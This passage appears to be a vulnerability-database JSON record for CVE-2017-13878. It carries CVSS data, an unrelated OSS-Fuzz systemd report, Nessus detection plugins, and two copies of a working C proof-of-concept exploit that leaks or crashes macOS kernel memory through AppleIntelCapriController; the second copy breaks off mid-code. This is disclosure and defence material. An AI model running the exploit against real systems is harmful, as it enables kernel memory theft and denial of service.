false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13878"], "modified": "2018-01-22T02:29:00", "cpe": [], "id": "CVE-2017-13878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13878", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:C"}, "cpe23": []}], "ossfuzz": [{"lastseen": "2020-04-04T15:06:16", "bulletinFamily": "software", "cvelist": [], "description": "Project:\nhttps://github.com/systemd/systemd.git\n\nDetailed report: https://oss-fuzz.com/testcase?key=5751069692395520\n\nProject: systemd\nFuzzer: libFuzzer_systemd_fuzz-link-parser\nFuzz target binary: fuzz-link-parser\nJob Type: libfuzzer_asan_systemd\nPlatform Id: linux\n\nCrash Type: Heap-use-after-free READ 8\nCrash Address: 0x603000000170\nCrash State:\n condition_free_list_type\n link_config_free\n link_load_one\n \nSanitizer: address (ASAN)\n\nRecommended Security Severity: High\n\nRegressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_systemd&range=201903210209:201903230207\n\nReproducer Testcase: https://oss-fuzz.com/download?testcase_id=5751069692395520\n\nIssue filed automatically.\n\nSee https://github.com/google/oss-fuzz/blob/master/docs/reproducing.md for instructions to reproduce this bug locally.\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout an upstream patch, then the bug report will automatically\nbecome visible to the public.\n\nWhen you fix this bug, please\n * mention the fix revision(s).\n * state whether the bug was a short-lived regression or an old bug in any stable releases.\n * add any other useful information.\nThis information can help downstream consumers.\n\nIf you need to contact the OSS-Fuzz team with a question, concern, or any other feedback, please file an issue at https://github.com/google/oss-fuzz/issues.", "modified": "2019-04-24T15:30:46", "published": "2019-03-23T04:05:42", "id": "OSSFUZZ-13878", "href": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=13878", "type": "ossfuzz", "title": "systemd/fuzz-link-parser: Heap-use-after-free in condition_free_list_type", "cvss": {}}], "nessus": [{"lastseen": "2020-09-23T18:28:42", "description": "This update for tiff fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-18661: Fixed NULL pointer dereference in the function\nLZWDecode in the file tif_lzw.c (bsc#1113672).\n\nCVE-2018-12900: Fixed heap-based buffer overflow in the\ncpSeparateBufToContigBuf (bsc#1099257).\n\nCVE-2017-9147: Fixed invalid read in the _TIFFVGetField function in\ntif_dir.c, that allowed remote attackers to cause a DoS via acrafted\nTIFF file (bsc#1040322).\n\nCVE-2017-9117: Fixed BMP images processing that was verified without\nbiWidth and biHeight values (bsc#1040080).\n\nCVE-2017-17942: Fixed issue in the function PackBitsEncode that could\nhave led to a heap overflow and caused a DoS (bsc#1074186).\n\nCVE-2016-9273: Fixed heap-based buffer overflow issue (bsc#1010163).\n\nCVE-2016-5319: Fixed heap-based buffer overflow in PackBitsEncode\n(bsc#983440).\n\nCVE-2016-3621: Fixed out-of-bounds read in the bmp2tiff tool (lzw\npacking) (bsc#974448).\n\nCVE-2016-3620: Fixed out-of-bounds read in the bmp2tiff tool (zip\npacking) (bsc#974447)\n\nCVE-2016-3619: Fixed out-of-bounds read in the bmp2tiff tool (none\npacking) (bsc#974446)\n\nCVE-2015-8870: Fixed integer overflow in tools/bmp2tiff.c that allowed\nremote attackers to causea DOS (bsc#1014461).\n\nNon-security issues fixed: asan_build: build ASAN included\n\ndebug_build: build more suitable for debugging\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-26T00:00:00", "title": "SUSE SLES11 Security Update : tiff (SUSE-SU-2018:3879-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5319", "CVE-2016-3619", "CVE-2016-3621", "CVE-2017-9117", "CVE-2016-3620", "CVE-2015-8870", "CVE-2018-18661", "CVE-2018-12900", "CVE-2016-9273", "CVE-2017-9147", "CVE-2017-17942"], "modified": "2018-11-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libtiff3", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:tiff"], "id": "SUSE_SU-2018-3879-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119143", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3879-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119143);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2015-8870\", \"CVE-2016-3619\", \"CVE-2016-3620\", \"CVE-2016-3621\", \"CVE-2016-5319\", \"CVE-2016-9273\", \"CVE-2017-17942\", \"CVE-2017-9117\", \"CVE-2017-9147\", \"CVE-2018-12900\", \"CVE-2018-18661\");\n\n script_name(english:\"SUSE SLES11 Security Update : tiff (SUSE-SU-2018:3879-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tiff fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-18661: Fixed NULL pointer dereference in the function\nLZWDecode in the file tif_lzw.c (bsc#1113672).\n\nCVE-2018-12900: Fixed heap-based buffer overflow in the\ncpSeparateBufToContigBuf (bsc#1099257).\n\nCVE-2017-9147: Fixed invalid read in the _TIFFVGetField function in\ntif_dir.c, that allowed remote attackers to cause a DoS via acrafted\nTIFF file (bsc#1040322).\n\nCVE-2017-9117: Fixed BMP images processing that was verified without\nbiWidth and biHeight values (bsc#1040080).\n\nCVE-2017-17942: Fixed issue in the function PackBitsEncode that could\nhave led to a heap overflow and caused a DoS (bsc#1074186).\n\nCVE-2016-9273: Fixed heap-based buffer overflow issue (bsc#1010163).\n\nCVE-2016-5319: Fixed heap-based buffer overflow in PackBitsEncode\n(bsc#983440).\n\nCVE-2016-3621: Fixed out-of-bounds read in the bmp2tiff tool (lzw\npacking) (bsc#974448).\n\nCVE-2016-3620: Fixed out-of-bounds read in the bmp2tiff tool (zip\npacking) (bsc#974447)\n\nCVE-2016-3619: Fixed out-of-bounds read in the bmp2tiff tool (none\npacking) (bsc#974446)\n\nCVE-2015-8870: Fixed integer overflow in tools/bmp2tiff.c that allowed\nremote attackers to causea DOS (bsc#1014461).\n\nNon-security issues fixed: asan_build: build ASAN included\n\ndebug_build: build more suitable for debugging\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1074186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1113672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3619/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3620/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3621/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5319/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9273/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-17942/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12900/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18661/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183879-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e798c7ce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-tiff-13878=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-tiff-13878=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-tiff-13878=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libtiff3-32bit-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libtiff3-32bit-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libtiff3-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"tiff-3.8.2-141.169.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tiff\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:20:26", "description": "The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-19T11:05:16", "description": "Exploit for macOS platform in category dos / poc", "edition": 1, "published": "2018-01-19T00:00:00", "type": "zdt", "title": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in AppleIntelCapriCon", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13878"], "modified": "2018-01-19T00:00:00", "href": "https://0day.today/exploit/description/29581", "id": "1337DAY-ID-29581", "sourceData": "/*\r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n \r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n \r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n \r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n*/\r\n \r\n// ianbeer\r\n// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit\r\n \r\n#if 0\r\nMacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability\r\n \r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n \r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n \r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n \r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\n#include <IOKit/IOKitLib.h>\r\n \r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n \r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IntelFBClientControl\"));\r\n \r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n \r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n \r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n \r\n char inputStruct[4096];\r\n size_t inputStructCnt = 8;\r\n *(uint64_t*)inputStruct = 0x12345678; // crash\r\n //*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory\r\n \r\n \r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 0;\r\n \r\n char outputStruct[4096];\r\n size_t outputStructCnt = 4096;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 0x710,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n \r\n if (outputStructCnt > 20) {\r\n int n_leaked_ptrs = (outputStructCnt-7)/8;\r\n uint64_t* ptrs = (uint64_t*) (outputStruct+7);\r\n for (int i = 0; i < n_leaked_ptrs; i++) {\r\n printf(\"%016llx\\n\", ptrs[i]);\r\n }\r\n }\r\n return 0;\r\n}\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29581", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-01-24T14:27:23", "description": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'. CVE-2017-13878. Dos ...", "published": "2018-01-19T00:00:00", "type": "exploitdb", "title": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13878"], "modified": "2018-01-19T00:00:00", "id": "EDB-ID:43780", "href": "https://www.exploit-db.com/exploits/43780/", "sourceData": "/*\r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n\r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n\r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n*/\r\n\r\n// ianbeer\r\n// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit\r\n\r\n#if 0\r\nMacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability\r\n\r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n\r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n\r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#include <IOKit/IOKitLib.h>\r\n\r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n\r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IntelFBClientControl\"));\r\n\r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n\r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = 